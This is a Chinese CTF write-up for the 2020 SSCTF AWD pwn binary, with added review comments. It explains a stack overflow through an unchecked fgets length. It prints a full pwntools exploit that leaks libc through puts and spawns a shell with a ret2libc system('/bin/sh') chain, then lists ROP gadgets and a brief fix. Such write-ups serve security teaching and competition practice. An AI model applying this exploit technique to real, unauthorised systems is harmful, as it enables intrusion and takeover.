2020SSCTF-AWD-PWN
October 16, 2020 CTF-Writeup 访问: 114 次
一台给了 root 权限的 pwn
攻击
没有开启任何保护
[*] '/media/psf/Home/Desktop/AWD/\xe5\xa4\x87\xe4\xbb\xbd/pwn'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
漏洞点在sub_40071D
/* Decompiled sub_40071D (the vulnerable routine named in the write-up).
 *
 * a1 - destination the caller wants the line copied to
 * a2 - length passed straight through to fgets(); it is caller-controlled and
 *      is never compared with the size of the local buffer
 *
 * `s` is a single byte at rbp-0xE, so any a2 larger than that lets fgets()
 * write past `s` over the saved frame and return address (the binary has no
 * stack canary and no PIE, per the checksec output above). The strcpy() that
 * follows is likewise unbounded. The defensive fix is to make the length that
 * reaches fgets() (and the copy into a1) no larger than the real buffer size,
 * which is what the 修补 section at the end of the page does at the call site.
 */
char *__fastcall sub_40071D(char *a1, int a2)
{
    char s; // [rsp+12h] [rbp-Eh]  -- 1-byte buffer receiving up to a2-1 bytes
    fgets(&s, a2, stdin);   // overflow: a2 is unchecked against sizeof(s)
    return strcpy(a1, &s);  // copies whatever was read, also unbounded
}
存在栈溢出,但是第一次只能覆盖到返回地址,所以我们把返回地址覆盖成这个函数,第二个参数就会变得很大
低四位要是大于0的数,不然fgets函数会直接返回0
然后进行栈溢出即可
#coding:utf-8
from pwn import *
import sys
# --- pwntools scaffolding -------------------------------------------------
context.log_level='debug'
# Local/remote selector. NOTE(review): this integer is rebound to a function by
# `def debug()` further down, so the flag is dead after that definition — one
# of the two should be renamed.
debug = 1
file_name = './pwn'
# Host libc used to compute offsets; the exploit only works when the target
# runs the same build.
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'
ip = ''
prot = ''
# if debug:
# r = process(file_name)
# libc = ELF(libc_name)
# else:
# r = remote(ip,int(prot))
# libc = ELF(libc_name)
# Parsed target binary (used for GOT/PLT lookups). Shadows the Python 2
# builtin `file`; harmless here but worth renaming.
file = ELF(file_name)
# I/O shorthands. They close over the global `r`, which is only assigned
# inside the retry loop below (late binding), so none of them may be called
# before that assignment.
sl = lambda x : r.sendline(x)
sd = lambda x : r.send(x)
sla = lambda x,y : r.sendlineafter(x,y)
rud = lambda x : r.recvuntil(x,drop=True)
ru = lambda x : r.recvuntil(x)
li = lambda name,x : log.info(name+':'+hex(x))
ri = lambda : r.interactive()
def debug():
    """Attach gdb to the running tube with a breakpoint at 0x40073F and pause.

    The breakpoint address lies between sub_40071D (0x40071D) and main
    (0x400759), so it is presumably inside the vulnerable routine — confirm
    in the disassembly. NOTE(review): defining this rebinds the module-level
    `debug = 1` flag above. Python 2 only (`raw_input`).
    """
    gdb.attach(r,"b *0x0000000040073F")
    raw_input()
# def attack():
# Fixed addresses: the binary is not PIE (loaded at 0x400000 per checksec), so
# GOT/PLT entries, gadgets and function addresses are constant across runs.
# Gadget addresses come from the ROPgadget listing at the bottom of this file.
puts_got = file.got['puts']
puts_plt = file.plt['puts']
p_rdi = 0x0000000000400833   # pop rdi ; ret
pp_rsi = 0x0000000000400831  # pop rsi ; pop r15 ; ret
main_addr = 0x000000000400759
pwn_func = 0x00000000040071D  # sub_40071D, the fgets/strcpy routine
# debug()
# Retry loop. After the first overwrite, the length sub_40071D hands to fgets
# is whatever the register happens to hold (the prose above notes it must be
# > 0, otherwise fgets returns immediately), so an unlucky run dies with
# EOFError and is simply repeated against a fresh process.
while True:
    try:
        r = process(file_name)
        libc = ELF(libc_name)  # re-parsed on every attempt; could be hoisted
        # debug()
        ru(" Who are you:\n")
        # sl("1")
        # payload = "\x11"*8#+p64(pwn_func)[:6]+p64(pp_rsi)[:6]
        '''
        "\x11"*16+p64(pwn_func)[:6]+p64(pp_rsi)[:6]
        '''
        # Stage 1: 22 bytes of padding reach the saved return address, which
        # is replaced by sub_40071D itself. Only the low 6 bytes are sent;
        # presumably because strcpy stops at the first NUL anyway — confirm.
        payload = "a"*22+p64(pwn_func)[:6]
        # print payload.encode("hex")
        sd(payload)
        # print len(payload)
        # raw_input()
        # sd(p64(puts_plt))
        # sl("\x22"*21+p64(p_rdi)+p64(puts_got)+p64(puts_plt)+p64(pp_rsi)+p64(0x1000)+p64(0)+p64(main_addr))
        # Stage 2: the re-entered sub_40071D now accepts a long line, so send a
        # chain that prints puts@got through puts@plt (libc leak) and then
        # returns into sub_40071D once more. 0x601220 is passed as a1;
        # presumably a writable address in the binary's data segment — confirm.
        sl("\x22"*21+p64(pp_rsi)+p64(0x1000)+p64(0)+p64(p_rdi)+p64(puts_got)+p64(puts_plt)+p64(p_rdi)+p64(0x601220)+p64(pwn_func))
        # The leaked pointer is 6 bytes; pad to 8 before u64. This is Python 2
        # str arithmetic — under Python 3 both operands would have to be bytes.
        libc_addr = u64(rud("\n")+"\x00\x00")-libc.symbols['puts']
        li("libc_addr",libc_addr)
        system = libc_addr+libc.symbols['system']
        # NOTE(review): hard-coded "/bin/sh" offset is specific to the libc
        # build the script was written against; next(libc.search('/bin/sh'))
        # would derive it from the loaded ELF instead.
        binsh = 0x000000000018ce17+libc_addr
        # raw_input()
        # Stage 3: classic ret2libc, system("/bin/sh"). The doubled
        # `payload = payload =` is a harmless typo.
        payload = payload = "a"*22+p64(p_rdi)+p64(binsh)+p64(system)
        sl(payload)
        # ru(" Who are you:\n")
        # sd("a"*(0xe+8)+p64(puts_got)+p64(puts_got)+p64(puts_plt)+p64(pp_rsi)+p64(0x1000)+p64(0)+p64(0x1234))
        ri()
    except EOFError:
        # Failed attempt (see loop comment): close the tube and try again.
        # NOTE(review): if process() itself raised, `r` is unbound or stale here.
        r.close()
# ROPgadget output for ./pwn, kept for reference. p_rdi (0x400833) and pp_rsi
# (0x400831) above are taken from this list; the rest is unused.
'''
0x000000000040082c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040082e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400830 : pop r14 ; pop r15 ; ret
0x0000000000400832 : pop r15 ; ret
0x000000000040082b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040082f : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400675 : pop rbp ; ret
0x0000000000400833 : pop rdi ; ret
0x0000000000400831 : pop rsi ; pop r15 ; ret
0x000000000040082d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400591 : ret
0x00000000004006a5 : ret 0xc148
Unique gadgets found: 12
'''
修补
修补就很好修了:直接把第一次调用 sub_40071D 时传入的第二个参数改小,使 fgets 写入的长度不超过栈上缓冲区 s 的可用空间即可。
参赛选手? 拿第一的?